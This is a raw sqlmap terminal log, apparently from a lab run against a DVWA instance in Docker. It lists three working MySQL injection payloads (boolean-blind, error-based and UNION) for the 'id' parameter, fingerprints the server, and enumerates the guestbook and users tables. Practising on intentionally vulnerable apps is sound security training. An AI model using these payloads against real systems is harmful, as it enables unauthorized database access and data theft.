[01;33m        ___
       __H__
 ___ ___[[01;41m)[01;49m]_____ ___ ___  [01;37m{[01;90m1.9.6#stable[01;37m}[01;33m
|_ -| . [[01;41m.[01;49m]     | .'| . |
|___|_  [[01;41m,[01;49m]_|_|_|__,|  _|
      |_|V...       |_|   [0m[4;37mhttps://sqlmap.org[0m

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:59:08 /2026-02-05/


[[36m22:59:08[0m] [[32mINFO[0m] fetched random HTTP User-Agent header value '[37mMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.7) Gecko/20040707 Firefox/0.9.2[0m' from file '[37m/usr/share/sqlmap/data/txt/user-agents.txt[0m'

[[36m22:59:09[0m] [[32mINFO[0m] resuming back-end DBMS '[37mmysql[0m' 

[[36m22:59:09[0m][1m [[32;1mINFO[0m][1m testing connection to the target URL[0m
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 6856=6856#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 2316 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(2316=2316,1))),0x716a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Lcvs&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7170767871,0x43706554415241464849796f5a4f625748767642524148586c6f686c424c41667446696950415a62,0x716a6a7671)#&Submit=Submit
---

[[36m22:59:09[0m][1m [[32;1mINFO[0m][1m the back-end DBMS is MySQL[0m
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0 ([37mMariaDB [0mfork)

[[36m22:59:09[0m] [[32mINFO[0m] fetching tables for database: '[37mdvwa[0m'

[[36m22:59:09[0m] [[33mWARNING[0m] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+


[[36m22:59:09[0m] [[32mINFO[0m] fetched data logged to text files under '[37m/root/.local/share/sqlmap/output/host.docker.internal[0m'

[[36m22:59:09[0m] [[33mWARNING[0m] your sqlmap version is outdated

[*] ending @ 22:59:09 /2026-02-05/

